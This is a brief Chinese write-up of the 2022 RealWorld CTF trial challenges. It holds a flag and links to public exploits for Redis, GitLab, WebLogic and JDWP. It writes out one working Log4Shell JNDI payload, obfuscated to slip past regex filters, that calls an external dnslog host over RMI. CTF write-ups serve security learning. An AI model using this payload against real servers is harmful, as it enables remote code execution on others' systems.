本文来自“白帽子社区知识星球”
作者:末初
rwctf{RealWorldIsAwesome}
log4flag
有一些正则过滤
网上bypass方法很多,随便找一个就行
${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}
Refer:https://cloud.tencent.com/developer/article/1921530
Be-a-Database-Hacker
redis
未授权访问Refer: https://github.com/n0b0dyCN/redis-rogue-server
the Secrets of Memory
Refer:https://landgrey.me/blog/16/
baby flaglab
Refer:https://github.com/Al1ex/CVE-2021-22205
Flag Console
Refer:https://github.com/backlion/CVE-2020-14882_ALL
Be-a-Database-Hacker 2
Refer:https://blog.csdn.net/qq_36869808/article/details/122426922
Java Remote Debugger
Test.java
import java.lang.Thread;
publicclass Test {
public static void main (String[] args) throws Exception{
int i = 0;
while (1 == 1) {
Thread.sleep(1000);
System.out.println("" + i);
i += 1;
}
}
}
Java Debug Wire Protocol (JDWP) - Remote Code Execution
Refer:https://security.tencent.com/index.php/blog/msg/137
如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。
▼扫码关注白帽子社区公众号&加入知识星球▼
原文始发于微信公众号(白帽子社区):2022 RealWorld CTF体验赛Writeup
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论